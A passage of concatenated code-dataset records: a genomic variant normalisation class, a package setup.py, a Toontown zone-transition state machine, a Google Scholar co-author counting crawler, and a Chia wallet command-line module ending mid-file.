alternate_allele = variant.alternate_allele
# keep a reference to the original. useful for printing.
self.original_variant = variant.original_variant
else:
# keep a reference to the original. useful for printing.
self.original_variant = variant
if variant.reference_allele == variant.alternate_allele:
chromosome = variant.chromosome
start = variant.start
reference_allele = variant.reference_allele
alternate_allele = variant.alternate_allele
elif variant.is_snp:
chromosome = variant.chromosome
start = variant.start
reference_allele = variant.reference_allele
alternate_allele = variant.alternate_allele
elif variant.is_indel:
# remove common nucleotides...
ref = variant.reference_allele
alt = variant.alternate_allele
i = 0
while i < min(len(ref), len(alt)) and ref[i] == alt[i]:
i += 1
chromosome = variant.chromosome
start = variant.start + i
reference_allele = ref[i:]
alternate_allele = alt[i:]
elif variant.is_deletion:
chromosome = variant.chromosome
start = variant.start + 1
reference_allele = variant.reference_allele[1:]
alternate_allele = ''
elif variant.is_insertion:
chromosome = variant.chromosome
start = variant.start
reference_allele = ''
alternate_allele = variant.alternate_allele[1:]
else:
raise errors.VeppyFeatureException(
'Unsupported variant: %s' % variant)
super(EffectiveVariant, self).__init__(
chromosome,
start,
reference_allele,
alternate_allele
)
# force insertions to have a [start, stop] range that
# overlaps the location of the inserted alternate allele
# essentially, make variant.stop == site of first inserted
# alternate allele
if self.is_insertion:
self.stop = self.start + 1
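    # Normalization examples (illustrative, traced through the branches above):
    #   EffectiveVariant(Variant('1', 100, 'AT', 'A'))    -> start 101, ref 'T', alt ''            (deletion)
    #   EffectiveVariant(Variant('1', 100, 'A', 'AT'))    -> start 100, ref '', alt 'T', stop 101  (insertion)
    #   EffectiveVariant(Variant('1', 100, 'ACG', 'ATG')) -> shared prefix 'A' trimmed:
    #                                                        start 101, ref 'CG', alt 'TG'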
# Variant types
@property
def is_substitution(self):
return self.original_variant.is_substitution
@property
def is_indel(self):
return self.original_variant.is_indel
@property
def is_insertion(self):
return self.original_variant.is_insertion
@property
def is_deletion(self):
return self.original_variant.is_deletion
@property
def is_snp(self):
return self.original_variant.is_snp
def clone(self):
return EffectiveVariant(self)
def __str__(self):
return str(self.original_variant)
| 32.349826 | 118 | 0.50919 |
4a1f6109b7ed4e99d15b4d4e1e14467e14af5a1b | 657 | py | Python | setup.py | stephen-david-evans/execs | 96397ee381f2d6d37dccf6dc9001ac83aab346db | [
"MIT"
] | null | null | null | setup.py | stephen-david-evans/execs | 96397ee381f2d6d37dccf6dc9001ac83aab346db | [
"MIT"
] | null | null | null | setup.py | stephen-david-evans/execs | 96397ee381f2d6d37dccf6dc9001ac83aab346db | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="execs",
version="0.0.1",
author="Stephen Evans",
author_email="[email protected]",
description="Experimental Entity Component System",
long_description=long_description,
long_description_type="text/markdown",
url="https://github.com/stephen-david-evans/execs",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.6",
)
| 28.565217 | 55 | 0.665145 |
4a1f61e6fd199d2394225dac0a2ba8678678a115 | 15,814 | py | Python | toontown/hood/QuietZoneState.py | TheFamiliarScoot/open-toontown | 678313033174ea7d08e5c2823bd7b473701ff547 | [
"BSD-3-Clause"
] | 99 | 2019-11-02T22:25:00.000Z | 2022-02-03T03:48:00.000Z | toontown/hood/QuietZoneState.py | TheFamiliarScoot/open-toontown | 678313033174ea7d08e5c2823bd7b473701ff547 | [
"BSD-3-Clause"
] | 42 | 2019-11-03T05:31:08.000Z | 2022-03-16T22:50:32.000Z | toontown/hood/QuietZoneState.py | TheFamiliarScoot/open-toontown | 678313033174ea7d08e5c2823bd7b473701ff547 | [
"BSD-3-Clause"
] | 57 | 2019-11-03T07:47:37.000Z | 2022-03-22T00:41:49.000Z | from pandac.PandaModules import *
from direct.showbase.PythonUtil import Functor, PriorityCallbacks
from direct.task import Task
from toontown.distributed.ToontownMsgTypes import *
from otp.otpbase import OTPGlobals
from direct.directnotify import DirectNotifyGlobal
from direct.fsm import StateData
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from . import ZoneUtil
class QuietZoneState(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('QuietZoneState')
Disable = False
Queue = []
def __init__(self, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.fsm = ClassicFSM.ClassicFSM('QuietZoneState', [State.State('off', self.enterOff, self.exitOff, ['waitForQuietZoneResponse']),
State.State('waitForQuietZoneResponse', self.enterWaitForQuietZoneResponse, self.exitWaitForQuietZoneResponse, ['waitForZoneRedirect']),
State.State('waitForZoneRedirect', self.enterWaitForZoneRedirect, self.exitWaitForZoneRedirect, ['waitForSetZoneResponse']),
State.State('waitForSetZoneResponse', self.enterWaitForSetZoneResponse, self.exitWaitForSetZoneResponse, ['waitForSetZoneComplete']),
State.State('waitForSetZoneComplete', self.enterWaitForSetZoneComplete, self.exitWaitForSetZoneComplete, ['waitForLocalAvatarOnShard']),
State.State('waitForLocalAvatarOnShard', self.enterWaitForLocalAvatarOnShard, self.exitWaitForLocalAvatarOnShard, ['off'])], 'off', 'off')
self._enqueueCount = 0
self.fsm.enterInitialState()
def load(self):
self.notify.debug('load()')
def unload(self):
self._dequeue()
self.notify.debug('unload()')
del self.fsm
@classmethod
def enqueueState(cls, state, requestStatus):
cls.Queue = [(state, requestStatus)] + cls.Queue
state._enqueueCount += 1
if len(cls.Queue) == 1:
cls.startNextQueuedState()
@classmethod
def dequeueState(cls, state):
s, requestStatus = cls.Queue.pop()
s._enqueueCount -= 1
if len(cls.Queue) > 0:
cls.startNextQueuedState()
@classmethod
def startNextQueuedState(cls):
state, requestStatus = cls.Queue[-1]
state._start(requestStatus)
def _dequeue(self):
newQ = []
for item in self.__class__.Queue:
state, requestStatus = item
if state is not self:
newQ.append(item)
self.__class__.Queue = newQ
def getEnterWaitForSetZoneResponseMsg(self):
return 'enterWaitForSetZoneResponse-%s' % (id(self),)
def getQuietZoneLeftEvent(self):
return '%s-%s' % (base.cr.getQuietZoneLeftEvent(), id(self))
def getSetZoneCompleteEvent(self):
return 'setZoneComplete-%s' % (id(self),)
def enter(self, requestStatus):
self.notify.debug('enter(requestStatus=' + str(requestStatus) + ')')
self._requestStatus = requestStatus
self._leftQuietZoneCallbacks = None
self._setZoneCompleteCallbacks = None
self._leftQuietZoneLocalCallbacks = {}
self._setZoneCompleteLocalCallbacks = {}
self.enqueueState(self, requestStatus)
return
def _start(self, requestStatus):
base.transitions.fadeScreen(1.0)
self.fsm.request('waitForQuietZoneResponse')
def getRequestStatus(self):
return self._requestStatus
def exit(self):
self.notify.debug('exit()')
del self._requestStatus
base.transitions.noTransitions()
self.fsm.request('off')
self._dequeue()
def waitForDatabase(self, description):
if base.endlessQuietZone:
return
base.cr.waitForDatabaseTimeout(requestName='quietZoneState-%s' % description)
def clearWaitForDatabase(self):
base.cr.cleanupWaitingForDatabase()
def addLeftQuietZoneCallback(self, callback, priority = None):
if self._leftQuietZoneCallbacks:
return self._leftQuietZoneCallbacks.add(callback, priority)
else:
token = PriorityCallbacks.GetToken()
fdc = SubframeCall(callback, taskMgr.getCurrentTask().getPriority() - 1)
self._leftQuietZoneLocalCallbacks[token] = fdc
return token
def removeLeftQuietZoneCallback(self, token):
if token is not None:
lc = self._leftQuietZoneLocalCallbacks.pop(token, None)
if lc:
lc.cleanup()
if self._leftQuietZoneCallbacks:
self._leftQuietZoneCallbacks.remove(token)
return
def addSetZoneCompleteCallback(self, callback, priority = None):
if self._setZoneCompleteCallbacks:
return self._setZoneCompleteCallbacks.add(callback, priority)
else:
token = PriorityCallbacks.GetToken()
fdc = SubframeCall(callback, taskMgr.getCurrentTask().getPriority() - 1)
self._setZoneCompleteLocalCallbacks[token] = fdc
return token
def removeSetZoneCompleteCallback(self, token):
if token is not None:
lc = self._setZoneCompleteLocalCallbacks.pop(token, None)
if lc:
lc.cleanup()
if self._setZoneCompleteCallbacks:
self._setZoneCompleteCallbacks.remove(token)
return
if not __astron__:
def handleWaitForQuietZoneResponse(self, msgType, di):
# self.notify.debug('handleWaitForQuietZoneResponse(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_CREATE_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_CREATE_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_UPDATE_FIELD:
base.cr.handleQuietZoneUpdateField(di)
elif msgType in QUIET_ZONE_IGNORED_LIST:
self.notify.debug('ignoring unwanted message from previous zone')
else:
base.cr.handlePlayGame(msgType, di)
else:
def handleWaitForQuietZoneResponse(self, msgType, di):
# self.notify.debug('handleWaitForQuietZoneResponse(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_ENTER_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_ENTER_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_SET_FIELD:
base.cr.handleQuietZoneUpdateField(di)
elif msgType in QUIET_ZONE_IGNORED_LIST:
self.notify.debug('ignoring unwanted message from previous zone')
else:
base.cr.handlePlayGame(msgType, di)
if not __astron__:
def handleWaitForZoneRedirect(self, msgType, di):
# self.notify.debug('handleWaitForZoneRedirect(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_CREATE_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_CREATE_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_UPDATE_FIELD:
base.cr.handleQuietZoneUpdateField(di)
else:
base.cr.handlePlayGame(msgType, di)
else:
def handleWaitForZoneRedirect(self, msgType, di):
# self.notify.debug('handleWaitForZoneRedirect(' + 'msgType=' + str(msgType) + ', di=' + str(di) + ')')
if msgType == CLIENT_ENTER_OBJECT_REQUIRED:
base.cr.handleQuietZoneGenerateWithRequired(di)
elif msgType == CLIENT_ENTER_OBJECT_REQUIRED_OTHER:
base.cr.handleQuietZoneGenerateWithRequiredOther(di)
elif msgType == CLIENT_OBJECT_SET_FIELD:
base.cr.handleQuietZoneUpdateField(di)
else:
base.cr.handlePlayGame(msgType, di)
def enterOff(self):
self.notify.debug('enterOff()')
def exitOff(self):
self.notify.debug('exitOff()')
self._leftQuietZoneCallbacks = PriorityCallbacks()
self._setZoneCompleteCallbacks = PriorityCallbacks()
self._leftQuietZoneLocalCallbacks = {}
self._setZoneCompleteLocalCallbacks = {}
def enterWaitForQuietZoneResponse(self):
# self.notify.debug('enterWaitForQuietZoneResponse(doneStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
base.cr.handler = self.handleWaitForQuietZoneResponse
base.cr.handlerArgs = self._requestStatus
base.cr.setInQuietZone(True)
self.setZoneDoneEvent = base.cr.getNextSetZoneDoneEvent()
self.acceptOnce(self.setZoneDoneEvent, self._handleQuietZoneComplete)
self.waitForDatabase('WaitForQuietZoneResponse')
if base.slowQuietZone:
def sQZR(task):
base.cr.sendQuietZoneRequest()
return Task.done
taskMgr.doMethodLater(base.slowQuietZoneDelay, sQZR, 'slowQuietZone-sendQuietZoneRequest')
else:
base.cr.sendQuietZoneRequest()
def _handleQuietZoneComplete(self):
self.fsm.request('waitForZoneRedirect')
def exitWaitForQuietZoneResponse(self):
self.notify.debug('exitWaitForQuietZoneResponse()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
base.cr.setInQuietZone(False)
self.ignore(self.setZoneDoneEvent)
del self.setZoneDoneEvent
return
def enterWaitForZoneRedirect(self):
# self.notify.debug('enterWaitForZoneRedirect(requestStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
base.cr.handler = self.handleWaitForZoneRedirect
base.cr.handlerArgs = self._requestStatus
base.cr.setInQuietZone(True)
self.waitForDatabase('WaitForZoneRedirect')
zoneId = self._requestStatus['zoneId']
avId = self._requestStatus.get('avId', -1)
allowRedirect = self._requestStatus.get('allowRedirect', 1)
if avId != -1:
allowRedirect = 0
if not base.cr.welcomeValleyManager:
newZoneId = ZoneUtil.getCanonicalZoneId(zoneId)
if newZoneId != zoneId:
self.gotZoneRedirect(newZoneId)
return
if allowRedirect and ZoneUtil.isWelcomeValley(zoneId):
self.notify.info('Requesting AI redirect from zone %s.' % zoneId)
if base.slowQuietZone:
def rZI(task, zoneId = zoneId, self = self):
base.cr.welcomeValleyManager.requestZoneId(zoneId, self.gotZoneRedirect)
return Task.done
taskMgr.doMethodLater(base.slowQuietZoneDelay, rZI, 'slowQuietZone-welcomeValleyRedirect')
else:
base.cr.welcomeValleyManager.requestZoneId(zoneId, self.gotZoneRedirect)
else:
self.fsm.request('waitForSetZoneResponse')
def gotZoneRedirect(self, zoneId):
self.notify.info('Redirecting to zone %s.' % zoneId)
base.cr.handlerArgs['zoneId'] = zoneId
base.cr.handlerArgs['hoodId'] = ZoneUtil.getHoodId(zoneId)
self.fsm.request('waitForSetZoneResponse')
def exitWaitForZoneRedirect(self):
self.notify.debug('exitWaitForZoneRedirect()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
base.cr.setInQuietZone(False)
return
def enterWaitForSetZoneResponse(self):
# self.notify.debug('enterWaitForSetZoneResponse(requestStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
messenger.send(self.getEnterWaitForSetZoneResponseMsg(), [self._requestStatus])
base.cr.handlerArgs = self._requestStatus
zoneId = self._requestStatus['zoneId']
base.cr.dumpAllSubShardObjects()
base.cr.resetDeletedSubShardDoIds()
base.cr.sendSetZoneMsg(zoneId)
self.waitForDatabase('WaitForSetZoneResponse')
self.fsm.request('waitForSetZoneComplete')
def exitWaitForSetZoneResponse(self):
self.notify.debug('exitWaitForSetZoneResponse()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
return
def enterWaitForSetZoneComplete(self):
# self.notify.debug('enterWaitForSetZoneComplete(requestStatus=' + str(self._requestStatus) + ')')
if not self.Disable:
base.cr.handlerArgs = self._requestStatus
if base.slowQuietZone:
def delayFunc(self = self):
def hSZC(task):
self._handleSetZoneComplete()
return Task.done
taskMgr.doMethodLater(base.slowQuietZoneDelay, hSZC, 'slowQuietZone-sendSetZoneComplete')
nextFunc = delayFunc
else:
nextFunc = self._handleSetZoneComplete
self.waitForDatabase('WaitForSetZoneComplete')
self.setZoneDoneEvent = base.cr.getLastSetZoneDoneEvent()
self.acceptOnce(self.setZoneDoneEvent, nextFunc)
if base.placeBeforeObjects:
self._leftQuietZoneCallbacks()
self._leftQuietZoneCallbacks = None
fdcs = list(self._leftQuietZoneLocalCallbacks.values())
self._leftQuietZoneLocalCallbacks = {}
for fdc in fdcs:
if not fdc.isFinished():
fdc.finish()
messenger.send(self.getQuietZoneLeftEvent())
return
def _handleSetZoneComplete(self):
self.fsm.request('waitForLocalAvatarOnShard')
def exitWaitForSetZoneComplete(self):
self.notify.debug('exitWaitForSetZoneComplete()')
self.clearWaitForDatabase()
base.cr.handler = base.cr.handlePlayGame
base.cr.handlerArgs = None
self.ignore(self.setZoneDoneEvent)
del self.setZoneDoneEvent
return
def enterWaitForLocalAvatarOnShard(self):
self.notify.debug('enterWaitForLocalAvatarOnShard()')
if not self.Disable:
base.cr.handlerArgs = self._requestStatus
self._onShardEvent = localAvatar.getArrivedOnDistrictEvent()
self.waitForDatabase('WaitForLocalAvatarOnShard')
if localAvatar.isGeneratedOnDistrict(localAvatar.defaultShard):
self._announceDone()
else:
self.acceptOnce(self._onShardEvent, self._announceDone)
def _announceDone(self):
base.localAvatar.startChat()
if base.endlessQuietZone:
self._dequeue()
return
doneEvent = self.doneEvent
requestStatus = self._requestStatus
self._setZoneCompleteCallbacks()
self._setZoneCompleteCallbacks = None
fdcs = list(self._setZoneCompleteLocalCallbacks.values())
self._setZoneCompleteLocalCallbacks = {}
for fdc in fdcs:
if not fdc.isFinished():
fdc.finish()
messenger.send(self.getSetZoneCompleteEvent(), [requestStatus])
messenger.send(doneEvent)
self._dequeue()
return
def exitWaitForLocalAvatarOnShard(self):
self.notify.debug('exitWaitForLocalAvatarOnShard()')
self.clearWaitForDatabase()
self.ignore(self._onShardEvent)
base.cr.handlerArgs = None
del self._onShardEvent
return
| 41.725594 | 147 | 0.652333 |
4a1f63002d19f6d62d374f34d0e2a69418352e45 | 2,596 | py | Python | Google Scholar Crawler/main.py | yuezih/Yuezih-Playground | 82bc5b09ed2748cee42185763ea9fbaab9b79f86 | [
"MIT"
] | 1 | 2022-03-06T04:43:52.000Z | 2022-03-06T04:43:52.000Z | Google Scholar Crawler/main.py | yuezih/Yuezih-Playground | 82bc5b09ed2748cee42185763ea9fbaab9b79f86 | [
"MIT"
] | null | null | null | Google Scholar Crawler/main.py | yuezih/Yuezih-Playground | 82bc5b09ed2748cee42185763ea9fbaab9b79f86 | [
"MIT"
] | null | null | null | import urllib.parse
import urllib.request
import re
import operator
class Author(object):
def __init__(self):
self.name = ''
self.artNum = 0
self.artTitle = []
authors = []
authorDict = {}
index = 0
data = ""
author_list = []
def getData(url):
header_dict={'Host': 'scholar.google.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Referer': 'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ',
'Connection': 'keep-alive'}
req = urllib.request.Request(url=url,headers=header_dict)
response = urllib.request.urlopen(req,timeout=120)
tempdata = response.read()
tempdata = tempdata.decode()
return tempdata
urls = ['https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ',
'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ&cstart=20&pagesize=80',
'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ&cstart=100&pagesize=100',
'https://scholar.google.co.id/citations?hl=zh-CN&user=oqYL6fQAAAAJ&cstart=200&pagesize=100']
for each in urls:
data += getData(each)
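# Parse the accumulated profile HTML. Each publication row carries its title inside a
# "gsc_a_at" anchor and its author list / venue inside "gs_gray" divs (selectors as
# observed in the page markup this script targets); the fixed slice offsets below strip
# those tag prefixes and suffixes.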
title_pattern = re.compile(r'gsc_a_at">.*?<')
author_pattern = re.compile(r'<div class="gs_gray">.*?</div><')
publisher_pattern = re.compile(r'</div><div class="gs_gray">.*?<span')
title = re.findall(title_pattern, data)
author = re.findall(author_pattern, data)
publisher = re.findall(publisher_pattern, data)
for i in range(len(title)):
title[i] = title[i][10:-1]
for i in range(len(author)):
author[i] = author[i][21:-7]
author_list.append(author[i].split(', '))
# for i in range(len(publisher)):
# publisher[i] = publisher[i][27:-5]
# for i in range(len(title)):
# print(title[i])
# print(author[i])
# print('')
def readAuthor(name):
global authors
global authorDict
global index
if name not in authorDict:
newAut = Author()
newAut.name = name
authors.append(newAut)
authorDict[name] = index
index += 1
authors[authorDict[name]].artNum += 1
for each_art in author_list:
for each_author in each_art:
readAuthor(each_author)
cmpfun = operator.attrgetter('artNum','name')
authors.sort(key = cmpfun,reverse = True)
for author in authors:
    author.name = author.name.rstrip('\n')
    print(f'{author.name} participated in {author.artNum} papers')
| 30.904762 | 148 | 0.641757 |
4a1f6393afc0c1602de77252c9b400adba146aad | 14,158 | py | Python | src/cmds/wallet.py | Quexington/chia-blockchain | d3ea1f119004749d8a65d292214e7856de1539c3 | ["Apache-2.0"] | null | null | null | src/cmds/wallet.py | Quexington/chia-blockchain | d3ea1f119004749d8a65d292214e7856de1539c3 | ["Apache-2.0"] | null | null | null | src/cmds/wallet.py | Quexington/chia-blockchain | d3ea1f119004749d8a65d292214e7856de1539c3 | ["Apache-2.0"] | null | null | null |
import click
import sys
import time
from datetime import datetime
from typing import Tuple, Optional, Callable, List
import aiohttp
import asyncio
from src.rpc.wallet_rpc_client import WalletRpcClient
from src.server.start_wallet import SERVICE_NAME
from src.util.bech32m import encode_puzzle_hash
from src.util.byte_types import hexstr_to_bytes
from src.util.config import load_config, load_config_cli
from src.util.default_root import DEFAULT_ROOT_PATH
from src.util.ints import uint64, uint16
from src.wallet.transaction_record import TransactionRecord
from src.wallet.util.wallet_types import WalletType
from src.cmds.units import units
from decimal import Decimal
def print_transaction(tx: TransactionRecord, verbose: bool, name) -> None:
if verbose:
print(tx)
else:
chia_amount = Decimal(int(tx.amount)) / units["chia"]
to_address = encode_puzzle_hash(tx.to_puzzle_hash, name)
print(f"Transaction {tx.name}")
print(f"Status: {'Confirmed' if tx.confirmed else ('In mempool' if tx.is_in_mempool() else 'Pending')}")
print(f"Amount: {chia_amount} {name}")
print(f"To address: {to_address}")
print("Created at:", datetime.fromtimestamp(tx.created_at_time).strftime("%Y-%m-%d %H:%M:%S"))
print("")
async def get_transaction(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
transaction_id = hexstr_to_bytes(args["tx_id"])
config = load_config_cli(DEFAULT_ROOT_PATH, "config.yaml", SERVICE_NAME)
name = config["network_overrides"]["config"][config["selected_network"]]["address_prefix"]
tx: TransactionRecord = await wallet_client.get_transaction(wallet_id, transaction_id=transaction_id)
print_transaction(tx, verbose=(args["verbose"] > 0), name=name)
async def get_transactions(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
txs: List[TransactionRecord] = await wallet_client.get_transactions(wallet_id)
config = load_config_cli(DEFAULT_ROOT_PATH, "config.yaml", SERVICE_NAME)
name = config["network_overrides"]["config"][config["selected_network"]]["address_prefix"]
if len(txs) == 0:
print("There are no transactions to this address")
for i in range(0, len(txs), 5):
for j in range(0, 5):
print_transaction(txs[i + j], verbose=(args["verbose"] > 0), name=name)
print("Press q to quit, or c to continue")
while True:
entered_key = sys.stdin.read(1)
if entered_key == "q":
return
elif entered_key == "c":
break
async def send(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
amount = Decimal(args["amount"])
fee = Decimal(args["fee"])
address = args["address"]
print("Submitting transaction...")
final_amount = uint64(int(amount * units["chia"]))
final_fee = uint64(int(fee * units["chia"]))
res = await wallet_client.send_transaction(wallet_id, final_amount, address, final_fee)
tx_id = res.name
start = time.time()
while time.time() - start < 10:
await asyncio.sleep(0.1)
tx = await wallet_client.get_transaction(wallet_id, tx_id)
if len(tx.sent_to) > 0:
print(f"Transaction submitted to nodes: {tx.sent_to}")
            print(f"Do 'chia wallet get_transaction -f {fingerprint} -tx 0x{tx_id}' to get status")
return
print("Transaction not yet submitted to nodes")
print(f"Do 'chia wallet get_transaction -f {fingerprint} -tx 0x{tx_id}' to get status")
async def get_address(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
wallet_id = args["id"]
res = await wallet_client.get_next_address(wallet_id)
print(res)
async def print_balances(args: dict, wallet_client: WalletRpcClient, fingerprint: int) -> None:
summaries_response = await wallet_client.get_wallets()
print(f"Wallet height: {await wallet_client.get_height_info()}")
print(f"Balances, fingerprint: {fingerprint}")
for summary in summaries_response:
wallet_id = summary["id"]
balances = await wallet_client.get_wallet_balance(wallet_id)
typ = WalletType(int(summary["type"])).name
if typ != "STANDARD_WALLET":
print(f"Wallet ID {wallet_id} type {typ} {summary['name']}")
print(f" -Confirmed: " f"{balances['confirmed_wallet_balance']/units['colouredcoin']}")
print(f" -Unconfirmed: {balances['unconfirmed_wallet_balance']/units['colouredcoin']}")
print(f" -Spendable: {balances['spendable_balance']/units['colouredcoin']}")
print(f" -Pending change: {balances['pending_change']/units['colouredcoin']}")
else:
print(f"Wallet ID {wallet_id} type {typ}")
print(
f" -Confirmed: {balances['confirmed_wallet_balance']} mojo "
f"({balances['confirmed_wallet_balance']/units['chia']} TXCH)"
)
print(
f" -Unconfirmed: {balances['unconfirmed_wallet_balance']} mojo "
f"({balances['unconfirmed_wallet_balance']/units['chia']} TXCH)"
)
print(
f" -Spendable: {balances['spendable_balance']} mojo "
f"({balances['spendable_balance']/units['chia']} TXCH)"
)
print(
f" -Pending change: {balances['pending_change']} mojo "
f"({balances['pending_change']/units['chia']} TXCH)"
)
async def get_wallet(wallet_client: WalletRpcClient, fingerprint: Optional[int] = None) -> Optional[Tuple[WalletRpcClient, int]]:
fingerprints = await wallet_client.get_public_keys()
if len(fingerprints) == 0:
print("No keys loaded. Run 'chia keys generate' or import a key")
return None
if fingerprint is not None:
if fingerprint not in fingerprints:
print(f"Fingerprint {fingerprint} does not exist")
return None
if len(fingerprints) == 1:
fingerprint = fingerprints[0]
if fingerprint is not None:
log_in_response = await wallet_client.log_in(fingerprint)
else:
print("Choose wallet key:")
for i, fp in enumerate(fingerprints):
print(f"{i+1}) {fp}")
val = None
while val is None:
val = input("Enter a number to pick or q to quit: ")
if val == "q":
return None
if not val.isdigit():
val = None
else:
index = int(val) - 1
if index >= len(fingerprints):
print("Invalid value")
val = None
continue
else:
fingerprint = fingerprints[index]
assert fingerprint is not None
log_in_response = await wallet_client.log_in(fingerprint)
if log_in_response["success"] is False:
if log_in_response["error"] == "not_initialized":
use_cloud = True
if "backup_path" in log_in_response:
path = log_in_response["backup_path"]
print(f"Backup file from backup.chia.net downloaded and written to: {path}")
val = input("Do you want to use this file to restore from backup? (Y/N) ")
if val.lower() == "y":
log_in_response = await wallet_client.log_in_and_restore(fingerprint, path)
else:
use_cloud = False
if "backup_path" not in log_in_response or use_cloud is False:
if use_cloud is True:
val = input(
"No online backup file found, \n Press S to skip restore from backup"
" \n Press F to use your own backup file: "
)
else:
val = input(
"Cloud backup declined, \n Press S to skip restore from backup"
" \n Press F to use your own backup file: "
)
if val.lower() == "s":
log_in_response = await wallet_client.log_in_and_skip(fingerprint)
elif val.lower() == "f":
val = input("Please provide the full path to your backup file: ")
log_in_response = await wallet_client.log_in_and_restore(fingerprint, val)
if "success" not in log_in_response or log_in_response["success"] is False:
if "error" in log_in_response:
error = log_in_response["error"]
            print(f"Error: {error}")
return None
return wallet_client, fingerprint
async def execute_with_wallet(wallet_rpc_port: int, fingerprint: int, extra_params: dict, function: Callable) -> None:
    wallet_client = None
    try:
config = load_config(DEFAULT_ROOT_PATH, "config.yaml")
self_hostname = config["self_hostname"]
if wallet_rpc_port is None:
wallet_rpc_port = config["wallet"]["rpc_port"]
wallet_client = await WalletRpcClient.create(self_hostname, uint16(wallet_rpc_port), DEFAULT_ROOT_PATH, config)
wallet_client_f = await get_wallet(wallet_client, fingerprint=fingerprint)
if wallet_client_f is None:
wallet_client.close()
await wallet_client.await_closed()
return
wallet_client, fingerprint = wallet_client_f
await function(extra_params, wallet_client, fingerprint)
except Exception as e:
if isinstance(e, aiohttp.client_exceptions.ClientConnectorError):
print(f"Connection error. Check if wallet is running at {wallet_rpc_port}")
else:
print(f"Exception from 'wallet' {e}")
    if wallet_client is not None:
        wallet_client.close()
        await wallet_client.await_closed()
@click.group("wallet", short_help="Manage your wallet")
def wallet_cmd() -> None:
pass
@wallet_cmd.command("get_transaction", short_help="Get a transaction")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("-tx", "--tx_id", help="transaction id to search for", type=str, required=True)
@click.option("--verbose", "-v", count=True, type=int)
def get_transaction_cmd(wallet_rpc_port: int, fingerprint: int, id: int, tx_id: str, verbose: int) -> None:
extra_params = {"id": id, "tx_id": tx_id, "verbose": verbose}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, get_transaction))
@wallet_cmd.command("get_transactions", short_help="Get all transactions")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("--verbose", "-v", count=True, type=int)
def get_transactions_cmd(wallet_rpc_port: int, fingerprint: int, id: int, verbose: bool) -> None:
extra_params = {"id": id, "verbose": verbose}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, get_transactions))
@wallet_cmd.command("send", short_help="Send chia to another wallet")
@click.option(
"-wp",
"--wallet-rpc-port",
help="Set the port where the Wallet is hosting the RPC interface. See the rpc_port under wallet in config.yaml",
type=int,
default=9256,
show_default=True,
)
@click.option("-f", "--fingerprint", help="Set the fingerprint to specify which wallet to use", type=int)
@click.option("-i", "--id", help="Id of the wallet to use", type=int, default=1, show_default=True, required=True)
@click.option("-a", "--amount", help="How much chia to send, in TXCH/XCH", type=str, required=True)
@click.option(
"-m", "--fee", help="Set the fees for the transaction", type=str, default="0", show_default=True, required=True
)
@click.option("-t", "--address", help="Address to send the TXCH/XCH", type=str, required=True)
def send_cmd(wallet_rpc_port: int, fingerprint: int, id: int, amount: str, fee: str, address: str) -> None:
extra_params = {"id": id, "amount": amount, "fee": fee, "address": address}
asyncio.run(execute_with_wallet(wallet_rpc_port, fingerprint, extra_params, send))
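# Illustrative invocation of the command defined above (a sketch only: the fingerprint,
# wallet id and address values are hypothetical; the `chia wallet` prefix matches the
# usage hints printed by `send` above):
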